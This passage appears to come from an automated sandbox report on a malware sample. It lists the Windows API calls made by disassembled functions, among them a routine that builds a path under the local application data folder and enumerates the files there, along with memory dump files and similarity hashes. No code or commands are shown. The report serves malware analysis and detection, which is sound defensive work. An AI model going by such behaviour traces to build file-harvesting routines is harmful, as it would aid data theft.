                              • Part of subcall function 0069BF9F: __amsg_exit.LIBCMT ref: 0069BFAF
                            • __getptd.LIBCMT ref: 0069C765
                            • __amsg_exit.LIBCMT ref: 0069C773
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0069C797
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 4cb9990aef3ce1a8107b640a40cbe649b41aff0f4eb4a208abc5826eea7693b5
                            • Instruction ID: 5c9ee928dc7781f0dee2da71b98ac7a91f90e07fc9e2c178aba364251901b3b3
                            • Opcode Fuzzy Hash: 4cb9990aef3ce1a8107b640a40cbe649b41aff0f4eb4a208abc5826eea7693b5
                            • Instruction Fuzzy Hash: 7CF06D329006009BDFA0BBF86946B9933EBAF00730F20514DF404AAAD2DB645941AE9A
                            Function 00694F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00694F7A
                            • lstrcat.KERNEL32(?,006A1070), ref: 00694F97
                            • lstrcat.KERNEL32(?,013A88C0), ref: 00694FAB
                            • lstrcat.KERNEL32(?,006A1074), ref: 00694FBD
                              • Part of subcall function 00694910: wsprintfA.USER32 ref: 0069492C
                              • Part of subcall function 00694910: FindFirstFileA.KERNEL32(?,?), ref: 00694943
                              • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A0FDC), ref: 00694971
                              • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A0FE0), ref: 00694987
                              • Part of subcall function 00694910: FindNextFileA.KERNEL32(000000FF,?), ref: 00694B7D
                              • Part of subcall function 00694910: FindClose.KERNEL32(000000FF), ref: 00694B92
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: 7f078e4fbbeaffd5dcc9e01b62753629db2e9a59456b5847fde12931dba1ad7e
                            • Instruction ID: 41fdde4c53423ddd8d702985f4f5abc650967a4b5d1d3b3b57eaaeb5eed5336f
                            • Opcode Fuzzy Hash: 7f078e4fbbeaffd5dcc9e01b62753629db2e9a59456b5847fde12931dba1ad7e
                            • Instruction Fuzzy Hash: 8121C8B69002086BCB98FBB0EC46EE9337DBB55304F004558B64997581EE749AC9CF96